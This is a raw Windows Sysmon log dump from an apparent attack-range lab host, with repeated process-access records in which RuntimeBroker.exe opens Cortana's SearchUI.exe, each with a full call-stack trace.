13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 